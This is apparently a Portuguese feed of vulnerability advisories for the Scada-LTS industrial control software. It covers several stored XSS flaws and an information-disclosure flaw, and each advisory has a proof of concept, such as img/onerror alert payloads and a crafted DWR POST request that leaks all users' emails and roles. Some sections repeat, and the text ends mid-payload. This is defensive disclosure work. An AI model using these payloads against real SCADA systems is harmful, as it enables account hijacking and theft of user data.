(XSS) Armazenado no endpoint <code>publisher_edit.shtm</code> parâmetro <code>alias</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9137" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9137</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>publisher_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>alias</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>publisher_edit.shtm</code></p> <p>Parâmetro: <code>alias</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>alias</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9137/image.png" width="775" height="485" srcset="/p/cve-2025-9137/image_hu_5233a8cd4b2f18d9.png 480w, /p/cve-2025-9137/image_hu_94453de285483063.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="159" data-flex-basis="383px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9138/ https://www.cvehunters.com/pt/p/cve-2025-9138/ <h2 id="cve-2025-9138-cross-site-scripting-xss-armazenado-no-endpoint-pointhierarchynew-via-path-parameter">CVE-2025-9138: Cross-Site Scripting (XSS) Armazenado no endpoint <code>pointHierarchy/new/</code> via path parameter </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9138" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9138</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>pointHierarchy/new/</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos via path parameter. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>pointHierarchy/new/</code></p><h2 id="cve-2025-9138-cross-site-scripting-xss-armazenado-no-endpoint-pointhierarchynew-via-path-parameter">CVE-2025-9138: Cross-Site Scripting (XSS) Armazenado no endpoint <code>pointHierarchy/new/</code> via path parameter </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9138" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9138</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>pointHierarchy/new/</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos via path parameter. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>pointHierarchy/new/</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário via path parameter. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(10)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9138/image.png" width="667" height="315" srcset="/p/cve-2025-9138/image_hu_a00d5e9a8a813e04.png 480w, /p/cve-2025-9138/image_hu_197f1e93b2a183a9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9139/ https://www.cvehunters.com/pt/p/cve-2025-9139/ <h2 id="cve-2025-9139-divulgação-de-informações-confidenciais-do-usuário-por-meio-do-endpoint-watchlistdwrinitdwr">CVE-2025-9139: Divulgação de informações confidenciais do usuário por meio do endpoint <code>WatchListDwr.init.dwr</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9139</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade foi identificada no endpoint <code>WatchListDwr.init.dwr</code> do SCADA-LTS que permite que qualquer usuário autenticado, mesmo com permissões mínimas, acesse informações confidenciais do usuário, incluindo nomes de usuário, e-mails, números de telefone e status de administrador. Esta falha constitui um problema de <b>Divulgação de Informações</b> e pode ser usada para facilitar ataques futuros, como phishing, escalonamento de privilégios ou engenharia social.</p><h2 id="cve-2025-9139-divulgação-de-informações-confidenciais-do-usuário-por-meio-do-endpoint-watchlistdwrinitdwr">CVE-2025-9139: Divulgação de informações confidenciais do usuário por meio do endpoint <code>WatchListDwr.init.dwr</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9139</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade foi identificada no endpoint <code>WatchListDwr.init.dwr</code> do SCADA-LTS que permite que qualquer usuário autenticado, mesmo com permissões mínimas, acesse informações confidenciais do usuário, incluindo nomes de usuário, e-mails, números de telefone e status de administrador. Esta falha constitui um problema de <b>Divulgação de Informações</b> e pode ser usada para facilitar ataques futuros, como phishing, escalonamento de privilégios ou engenharia social.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"> <ul> <li><b>Endpoint vulnerável:</b> <code>POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr</code></li> <li><b>Autenticação necessária:</b> Sim (usuário com privilégios baixos)</li> <li><b>Parâmetro afetado:</b> N/A (chamada DWR estática)</li> <li><b>Tipo de impacto:</b> Divulgação de informações</li> </ul> </p> <p style="text-align: justify;">Ao emitir uma solicitação POST elaborada para o endpoint vulnerável, um usuário com privilégios baixos consegue recuperar Informações detalhadas de todos os usuários do sistema. O backend responde com um objeto JavaScript completo contendo dados como nomes de usuário, e-mails, sinalizadores de administrador e números de telefone. <h3 id="exemplo-de-solicitação">Exemplo de solicitação: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1 </span></span><span class="line"><span class="cl">Host: kubernetes.docker.internal:8080 </span></span><span class="line"><span class="cl">Content-Type: text/plain </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">callCount=1 </span></span><span class="line"><span class="cl">page=/Scada-LTS/watch_list.shtm </span></span><span class="line"><span class="cl">httpSessionId= </span></span><span class="line"><span class="cl">scriptSessionId=XYZ123456789 </span></span><span class="line"><span class="cl">c0-scriptName=WatchListDwr </span></span><span class="line"><span class="cl">c0-methodName=init </span></span><span class="line"><span class="cl">c0-id=0 </span></span><span class="line"><span class="cl">batchId=1 </span></span></code></pre></td></tr></table> </div> </div><h3 id="exemplo-de-snippet-de-resposta">Exemplo de snippet de resposta:: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">javascript </span></span><span class="line"><span class="cl">s7.admin=true; </span></span><span class="line"><span class="cl">s7.email="admin@yourMangoDomain.com"; </span></span><span class="line"><span class="cl">s7.username="admin"; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">s8.admin=false; </span></span><span class="line"><span class="cl">s8.email="anonymous@mail.com"; </span></span><span class="line"><span class="cl">s8.username="anonymous"; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">s11.admin=false; </span></span><span class="line"><span class="cl">s11.email="user1@x.com"; </span></span><span class="line"><span class="cl">s11.phone="13212313131"; </span></span><span class="line"><span class="cl">s11.username="user1"; </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><h3 id="autentique-como-qualquer-usuário-válido-com-poucos-privilégios">Autentique como qualquer usuário válido com poucos privilégios. </h3><p><img src="/p/cve-2025-9139/image.png" width="1902" height="320" srcset="/p/cve-2025-9139/image_hu_c33d08b2cce4521c.png 480w, /p/cve-2025-9139/image_hu_7747a0e6ad4d8864.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="594" data-flex-basis="1426px" /></p> <h3 id="envie-a-solicitação-post-acima-para-scada-ltsdwrcallplaincallwatchlistdwrinitdwr">Envie a solicitação POST acima para <code>/Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr</code> </h3><p><img src="/p/cve-2025-9139/image-1.png" width="1680" height="776" srcset="/p/cve-2025-9139/image-1_hu_ff5188c788d16204.png 480w, /p/cve-2025-9139/image-1_hu_73d12e3ba16d4378.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <h3 id="observe-a-resposta-do-servidor-contendo-informações-confidenciais-de-todos-os-usuários-do-sistema-scada">Observe a resposta do servidor contendo informações confidenciais de todos os usuários do sistema SCADA. </h3><h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Violação de Privacidade: E-mails, números de telefone e nomes de usuário de todos os usuários, incluindo administradores, são expostos.</li> <li>Suporte para Escalação de Privilégios: O conhecimento dos nomes de usuário e funções dos administradores pode ser utilizado em ataques futuros.</li> <li>Phishing e Engenharia Social: Informações de contato expostas podem ser usadas para criar ataques altamente direcionados.</li> <li>Reconhecimento: Os invasores podem mapear a estrutura de usuários do sistema SCADA-LTS para posterior exploração. </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md</a></strong></em></p> <h2 id="localizador">Localizador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9143/ https://www.cvehunters.com/pt/p/cve-2025-9143/ <h2 id="cve-2025-9143-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-mailing_listsshtm">CVE-2025-9143: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>mailing_lists.shtm</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9143</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>mailing_lists.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>name</code>, <code>userList</code> e <code>address</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>mailing_lists.shtm</code></p><h2 id="cve-2025-9143-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-mailing_listsshtm">CVE-2025-9143: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>mailing_lists.shtm</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9143</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>mailing_lists.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>name</code>, <code>userList</code> e <code>address</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>mailing_lists.shtm</code></p> <p>Parâmetros:<code>name</code>, <code>userList</code> e <code>address</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>name</code>, <code>userList</code> e <code>address</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(40)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9143/image.png" width="651" height="282" srcset="/p/cve-2025-9143/image_hu_f77d2b1f1c4b31b9.png 480w, /p/cve-2025-9143/image_hu_a232c9a2c6913e32.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="554px" /></p> <p><img src="/p/cve-2025-9143/image-1.png" width="631" height="309" srcset="/p/cve-2025-9143/image-1_hu_e0bceb375f809227.png 480w, /p/cve-2025-9143/image-1_hu_255f4bd3b7c4235d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="204" data-flex-basis="490px" /></p> <p><img src="/p/cve-2025-9143/image-2.png" width="635" height="301" srcset="/p/cve-2025-9143/image-2_hu_e954bce300e18350.png 480w, /p/cve-2025-9143/image-2_hu_c4a2e415bf078fda.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="506px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9144/ https://www.cvehunters.com/pt/p/cve-2025-9144/ <h2 id="cve-2025-9144-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-name">CVE-2025-9144: Cross-Site Scripting (XSS) Armazenado no endpoint <code>publisher_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9144" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9144</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>publisher_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>publisher_edit.shtm</code></p><h2 id="cve-2025-9144-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-name">CVE-2025-9144: Cross-Site Scripting (XSS) Armazenado no endpoint <code>publisher_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9144" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9144</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>publisher_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>publisher_edit.shtm</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(32)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9144/image.png" width="632" height="301" srcset="/p/cve-2025-9144/image_hu_74749039920d3c9.png 480w, /p/cve-2025-9144/image_hu_425acfacce4d9280.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="503px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9145/ https://www.cvehunters.com/pt/p/cve-2025-9145/ <h2 id="cve-2025-9145-injeção-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg">CVE-2025-9145: Injeção de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9145" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9145</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p align="justify">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint <code>view_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para o parâmetro <code>backgroundImageMP</code>. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.</p><h2 id="cve-2025-9145-injeção-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg">CVE-2025-9145: Injeção de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9145" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9145</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p align="justify">Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint <code>view_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para o parâmetro <code>backgroundImageMP</code>. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>view_edit.shtm</code></p> <p>Parâmetro: <code>backgroundImageMP</code></p> <p align="justify">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>backgroundImageMP</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><p align="justify">Salve o payload no arquivo <code>xss.svg</code>.</p> <p align="justify">Após isso, acesse a página <code>views.shtm</code> e clique em <code>"computer +"</code> para adicionar uma nova <code>"view"</code>, clique no botão <code>"Escolher arquivo"</code> para escolher o arquivo malicioso, depois clique no botão <code>"Upload image"</code> para enviar o arquivo. Em seguida, clique no botão <code>"Save"</code>. Acesse o arquivo pela página de gatilho.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span 